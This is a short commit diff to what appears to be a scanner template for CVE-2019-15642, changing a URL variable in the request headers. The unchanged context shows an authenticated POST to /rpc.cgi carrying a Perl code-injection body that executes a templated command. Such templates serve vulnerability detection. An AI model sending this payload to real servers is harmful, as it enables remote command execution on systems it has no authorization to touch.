Update CVE-2019-15642.yaml
parent
dfcb2fbfdc
commit
e58f84bf60
|
@ -24,9 +24,9 @@ http:
|
|||
POST /session_login.cgi HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Cookie: redirect=1; testing=1
|
||||
Origin: {{BaseURL}}
|
||||
Origin: {{RootURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Referer: {{BaseURL}}
|
||||
Referer: {{RootURL}}
|
||||
Accept-Encoding: gzip, deflate
|
||||
|
||||
user={{username}}&pass={{password}}
|
||||
|
@ -35,7 +35,7 @@ http:
|
|||
POST /rpc.cgi HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
Referer: {{BaseURL}}/sysinfo.cgi?xnavigation=1
|
||||
Referer: {{RootURL}}/sysinfo.cgi?xnavigation=1
|
||||
Accept-Encoding: gzip, deflate
|
||||
|
||||
OBJECT Socket;print "Content-Type: text/plain\n\n";$cmd={{cmd}};print "$cmd\n\n";
|
||||
|
|
Loading…
Reference in New Issue